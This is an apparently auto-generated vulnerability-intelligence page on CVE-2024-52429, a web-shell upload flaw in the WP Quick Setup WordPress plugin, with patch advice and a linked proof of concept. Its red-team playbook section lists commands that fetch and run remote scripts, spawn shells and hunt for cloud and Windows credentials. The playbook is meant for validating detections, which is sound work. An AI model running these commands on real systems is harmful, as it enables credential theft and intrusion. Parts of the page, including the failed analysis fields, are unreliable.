CVE-2024-52429
Overview
This vulnerability is an unrestricted file upload flaw affecting the file upload functionality in the AntonHoelstad WP Quick Setup WordPress plugin. The root cause is the lack of proper validation and restriction on the types of files that users can upload, specifically allowing dangerous file types such as web shells. The affected component is the upload handler within the WP Quick Setup plugin versions up to and including 2.0.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in AntonHoelstad WP Quick Setup wp-quick-setup allows Upload a Web Shell to a Web Server.This issue affects WP Quick Setup: from n/a through <= 2.0.
Impact
An attacker with a low-privileged authenticated account can upload a malicious web shell to the server, enabling arbitrary code execution with the privileges of the web server process. This can lead to full system compromise, unauthorized data access, and lateral movement within the hosting environment. The vulnerability enables attackers to bypass normal security controls by leveraging the plugin's upload feature without requiring elevated privileges or user interaction beyond authentication.
Solution
Users of AntonHoelstad WP Quick Setup should upgrade to version 2.1 or later, where this unrestricted file upload vulnerability has been addressed. Detailed patch instructions and version updates are available at Patchstack's advisory page: https://patchstack.com/database/Wordpress/Plugin/wp-quick-setup/vulnerability/wordpress-wp-quick-setup-plugin-2-0-arbitrary-plugin-and-theme-installation-to-remote-code-execution-vulnerability?_s_id=cve. No vendor-specific advisory IDs were provided; upgrading to the fixed version is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability present in the WP Quick Setup plugin allows for the unrestricted upload of files with dangerous types, specifically enabling the upload of web shells to a web server. This flaw stems from inadequate validation of file types during the upload process, which permits malicious users to bypass security measures and execute arbitrary code on the server. The affected versions of the plugin, up to and including 2.0, fail to implement proper checks on the file extensions and content types, allowing attackers to upload potentially harmful scripts disguised as legitimate files. This oversight creates a significant security gap, as it directly undermines the integrity of the web application and the server it operates on.
Attack vectors associated with this vulnerability can be varied and complex. An attacker could exploit this weakness by crafting a malicious file, such as a PHP script, and uploading it through the plugin's file upload feature. Once the web shell is successfully uploaded, the attacker gains remote access to the server, allowing them to execute commands, manipulate files, and potentially pivot to other systems within the network. This exploitation could occur in various scenarios, including targeted attacks against vulnerable WordPress installations or as part of broader automated attacks where bots scan for known vulnerabilities in plugins. The ease of exploitation, combined with the potential for significant control over the affected server, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be profound, especially for businesses relying on WordPress for their online presence. Successful exploitation can lead to data breaches, unauthorized access to sensitive information, and the potential for defacement of the website. Furthermore, the presence of a web shell can facilitate lateral movement within the network, allowing attackers to compromise additional systems or exfiltrate data. The business risks associated with such incidents include reputational damage, loss of customer trust, regulatory penalties, and significant recovery costs. Organizations may also face downtime as they work to remediate the breach, further impacting their operations and bottom line.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating plugins and themes is crucial, as it ensures that known vulnerabilities are patched. Additionally, employing web application firewalls (WAF) can help filter out malicious requests and prevent unauthorized file uploads. Monitoring server logs for unusual activity, such as unexpected file uploads or execution of scripts, can also aid in early detection of exploitation attempts. Furthermore, conducting regular security assessments and penetration testing can help identify vulnerabilities before they can be exploited by malicious actors.
In conclusion, the unrestricted upload of files with dangerous types in the WP Quick Setup plugin represents a critical security vulnerability that poses significant risks to affected systems. The potential for web shell deployment allows attackers to gain unauthorized control over web servers, leading to severe consequences for businesses. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can take proactive measures to detect and mitigate the associated risks, ultimately safeguarding their digital assets and maintaining the trust of their customers.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-52429, marked by the emergence of publicly available proof-of-concept exploit code on GitHub. This new availability of exploit tools has directly influenced the vulnerability’s risk profile, as reflected by the assignment of a critical CVSS score of 9.9 and the appearance of a substantial EPSS score above 0.4. Our telemetry indicates a marked escalation in the potential for adversaries to weaponize this vulnerability, increasing the likelihood of successful web shell deployments on affected WP Quick Setup installations. The presence of a stable yet elevated EPSS score underscores a persistent and credible threat, signaling that exploitation attempts may become more frequent and widespread. Consequently, the threat level for organizations using this plugin has risen sharply, necessitating heightened vigilance in detection and response efforts to counteract the growing exploitation risk.
Update 2 — June 09, 2026
The recent downward adjustment of the CVSS score for CVE-2024-52429 from 9.9 to 8.8 reflects a refined understanding of the vulnerability’s exploitability and impact, informed by ongoing analysis and community feedback. This recalibration, while lowering the severity rating, does not diminish the critical nature of the vulnerability but rather contextualizes its risk more precisely. CSURFACE threat intelligence notes that the EPSS score remains elevated and stable, indicating sustained adversary interest and a persistent exploitation potential. Additionally, the emergence of a new proof-of-concept exploit targeting authorization bypass in WP Quick Setup underscores the evolving tactics threat actors employ to leverage this vulnerability. For defenders, this nuanced update signals the necessity to maintain rigorous monitoring and response capabilities, as the threat remains highly credible and active. The adjusted risk assessment suggests a slightly moderated but still high threat level, emphasizing that exploitation attempts will likely continue, particularly in environments where patching and access controls are insufficiently enforced.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Antonhoelstad | Wp Quick Setup | All |
cpe:2.3:a:antonhoelstad:wp_quick_setup:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
|
RandomRobbieBF | 1 | 0 | 2024-11-22 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-52429 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/wp-quick-setup/vulnerability/wordpress-wp-quick-setup-plugin-2-0-arbitrary-plugin-and-theme-installation-to-remote-code-execution-vulnerability?_s_id=cve |